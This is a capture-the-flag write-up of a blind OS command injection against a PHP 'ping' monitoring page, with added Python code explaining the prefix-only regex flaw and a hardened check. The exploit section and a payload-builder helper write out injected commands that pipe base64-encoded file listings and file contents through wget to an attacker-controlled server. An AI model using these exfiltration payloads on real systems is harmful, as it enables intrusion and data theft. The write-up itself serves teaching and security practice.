Tags: blind-os-command-injection 

# ▼▼▼fancy-alive-monitoring - Points: 400▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
Uh oh, the login page is more secure... I think. http://2018shell2.picoctf.com:56265 (link). Source(http://2018shell2.picoctf.com:17593/index.txt).

Hint:
・This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate.
・You should be able to listen through the shell on the server.
```

---
## 【view source code & Identify the vulnerability】

`http://2018shell2.picoctf.com:17593/index.txt`

```
<html>
<head>
<title>Monitoring Tool</title>
<script>
function check(){
ip = document.getElementById("ip").value;
chk = ip.match(/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/);
if (!chk) {
alert("Wrong IP format.");
return false;
} else {
document.getElementById("monitor").submit();
}
}
</script>
</head>
<body>
<h1>Monitoring Tool ver 0.1</h1>
<form id="monitor" action="index.php" method="post" onsubmit="return false;">

Input IP address of the target host
<input id="ip" name="ip" type="text">


<input type="button" value="Go!" onclick="check()">
</form>
<hr>

Target is NOT alive.</h3>");
break;
} else if (strpos($str, ', 0% packet loss') !== false){
printf("<h3>Target is alive.</h3>");
break;
}
}
} else {
echo "Wrong IP Format.";
}
}
?>
<hr>
index.php source code
</body>
</html>
```

`preg_match('/^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])/',$ip)`

The server-side pattern is anchored with `^` but has no `$` (or `\z`) at the end, so it is only a prefix match: the input merely has to *start* with something that looks like an IPv4 address, and whatever follows the fourth octet is accepted and passed to the shell together with it. (The `.` between octets is also unescaped, so it matches any character, not just a dot.) The client-side `check()` does use `$`, but it runs in the browser and is bypassed simply by sending the POST request directly.

The checked string is concatenated into a shell command (the `packet loss` checks show it is `ping`), and the page only reports "alive" / "NOT alive" rather than echoing the command output. This is therefore a `Blind OS command injection` vulnerability: injected commands run, but their output has to be exfiltrated out of band.
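To see exactly what the prefix match lets through, here is the same check transcribed into Python as an added example (this is not code from the challenge or from the writeup): `server_check` mirrors `preg_match()` with the pattern above, `dollar_check` is the naive fix that appends `$`, and `hardened_check` plus `build_ping_command` show what a correct server side looks like. The `ping -c 1` invocation is an assumption, since the start of the PHP is not visible in the copy of index.txt above; `shlex.quote` stands in for PHP's `escapeshellarg`.

```python
import ipaddress
import re
import shlex

# The server-side pattern from index.txt, transcribed verbatim. Two defects:
# no end anchor ($ or \z), and an unescaped "." between the octets.
SERVER_RE = re.compile(
    r'^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}'
    r'([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])'
)

# The "obvious" fix: the same pattern with a trailing $.
DOLLAR_RE = re.compile(SERVER_RE.pattern + r'$')


def server_check(ip: str) -> bool:
    """Mirror preg_match(): the pattern only has to match starting at offset 0,
    so anything after a valid-looking fourth octet is accepted."""
    return SERVER_RE.search(ip) is not None


def dollar_check(ip: str) -> bool:
    """Better, but $ matches before a trailing newline in both PCRE and Python,
    so "127.0.0.1\\n" still passes; use \\z (PCRE) or fullmatch() (Python)."""
    return DOLLAR_RE.search(ip) is not None


def hardened_check(ip: str) -> bool:
    """Whole-string validation: fullmatch() rejects any suffix, newline
    included, and the ipaddress parser rejects junk that the unescaped "."
    still lets through (e.g. "1;2;3;4" satisfies the pattern)."""
    if SERVER_RE.fullmatch(ip) is None:
        return False
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return False
    return True


def build_ping_command(ip: str) -> str:
    """What a safe index.php would do before calling the shell: validate, then
    quote the argument (shlex.quote plays the role of PHP's escapeshellarg).
    'ping -c 1' is an assumed invocation; the real one is not visible in the
    truncated index.txt."""
    if not hardened_check(ip):
        raise ValueError("Wrong IP Format.")
    return "ping -c 1 " + shlex.quote(ip)


if __name__ == "__main__":
    payload = "127.0.0.1;ls|base64|xargs wget http://my_server --user-agent"
    for name, check in [("server_check", server_check),
                        ("dollar_check", dollar_check),
                        ("hardened_check", hardened_check)]:
        print(f"{name:15} payload={check(payload)!s:5} "
              f"newline={check('127.0.0.1' + chr(10))!s:5} "
              f"junk={check('1;2;3;4')!s:5} good={check('127.0.0.1')}")
```

Run stand-alone, the table shows the writeup's payload passing only `server_check`, the newline case passing `dollar_check` as well, and only the real address passing `hardened_check`.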

---

## 【exploit】

```
POST /index.php HTTP/1.1
Host: 2018shell2.picoctf.com:17593
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

ip=127.0.0.1;ls|base64|xargs wget http://my_server --user-agent
```

The `;` terminates the `ping` command and what follows runs as a second command: the output of `ls` is base64-encoded and piped to `xargs`, which appends it as the value of `--user-agent` on a `wget` request to a server under the attacker's control (`http://my_server` here). The command output therefore never has to appear in the HTTP response; it shows up in that server's access log.

↓ access.log of my server

```
18.224.157.204 - - [15/Oct/2018:15:21:34 +0000] "GET / HTTP/1.1" 200 2261 "-" "aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTEzMzUtZmxhZy50eHQKeGluZXRfc3RhcnR1"
```

`aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTEzMzUtZmxhZy50eHQKeGluZXRfc3RhcnR1`

↓ base64 decode

```
index.php
index.txt
the-secret-1335-flag.txt
xinet_startu
```

The listing is cut off after `xinet_startu` because GNU `base64` wraps its output at 76 characters and `xargs` passes each line as a separate argument, so only the first line became the User-Agent value (the remaining lines are handed to `wget` as extra arguments). `base64 -w0` avoids this; here the first line already contained the interesting filename, so it did not matter.

---

```
POST /index.php HTTP/1.1
Host: 2018shell2.picoctf.com:17593
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

ip=127.0.0.1;cat the-secret-1335-flag.txt|base64|xargs wget http://my_server --user-agent
```

```
18.224.157.204 - - [15/Oct/2018:15:24:13 +0000] "GET / HTTP/1.1" 200 2261 "-" "SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfZDdhZDE2MmR9Cgo="
```

↓ base64 decode

Here is your flag: `picoCTF{n3v3r_trust_a_b0x_d7ad162d}`
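Decoding the User-Agent values by hand works for two lines, but the same step as a small script is handier and also explains why the directory listing above stops at `xinet_startu`. This is an added example, not the author's tooling: it parses the two access.log lines quoted in this writeup (embedded below as sample input), base64-decodes the User-Agent field, flags a value that was probably cut by `base64`'s 76-column line wrapping, and builds the same injection string with `base64 -w0` so the whole result fits in one argument (this assumes GNU coreutils `base64` on the target, since `-w` is a GNU option).

```python
import base64
import re

# The two access.log lines quoted in this writeup (combined log format); the
# exfiltrated data travels in the User-Agent field, the last quoted string.
LOG_LINES = [
    '18.224.157.204 - - [15/Oct/2018:15:21:34 +0000] "GET / HTTP/1.1" 200 2261 "-" '
    '"aW5kZXgucGhwCmluZGV4LnR4dAp0aGUtc2VjcmV0LTEzMzUtZmxhZy50eHQKeGluZXRfc3RhcnR1"',
    '18.224.157.204 - - [15/Oct/2018:15:24:13 +0000] "GET / HTTP/1.1" 200 2261 "-" '
    '"SGVyZSBpcyB5b3VyIGZsYWc6IHBpY29DVEZ7bjN2M3JfdHJ1c3RfYV9iMHhfZDdhZDE2MmR9Cgo="',
]

COMBINED_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# GNU base64 wraps at 76 columns; xargs then hands each wrapped line to wget as
# a separate argument, so only the first line lands in --user-agent.
BASE64_WRAP = 76


def decode_exfil(line: str) -> dict:
    """Extract the User-Agent from a combined-format log line and decode it.

    A value that is exactly one wrapped line long and carries no '=' padding is
    a strong hint that more lines followed and were dropped (the first line in
    LOG_LINES ends mid-filename for exactly that reason)."""
    m = COMBINED_LOG_RE.match(line)
    if m is None:
        raise ValueError("not a combined-format log line")
    ua = m.group("ua")
    data = base64.b64decode(ua, validate=True).decode("utf-8", "replace")
    maybe_truncated = len(ua) == BASE64_WRAP and not ua.endswith("=")
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "data": data,
        "maybe_truncated": maybe_truncated,
    }


def exfil_payload(command: str, callback_url: str) -> str:
    """Build the value of the ip= parameter the way the writeup does, but with
    'base64 -w0' so the whole output is one argument. Form-encode the result
    before putting it in the POST body."""
    return f"127.0.0.1;{command}|base64 -w0|xargs wget {callback_url} --user-agent"


if __name__ == "__main__":
    for line in LOG_LINES:
        hit = decode_exfil(line)
        flag = " (probably truncated by base64 line wrapping)" if hit["maybe_truncated"] else ""
        print(f"{hit['client']} {hit['time']}{flag}\n{hit['data']}")
    print(exfil_payload("cat the-secret-1335-flag.txt", "http://my_server"))
```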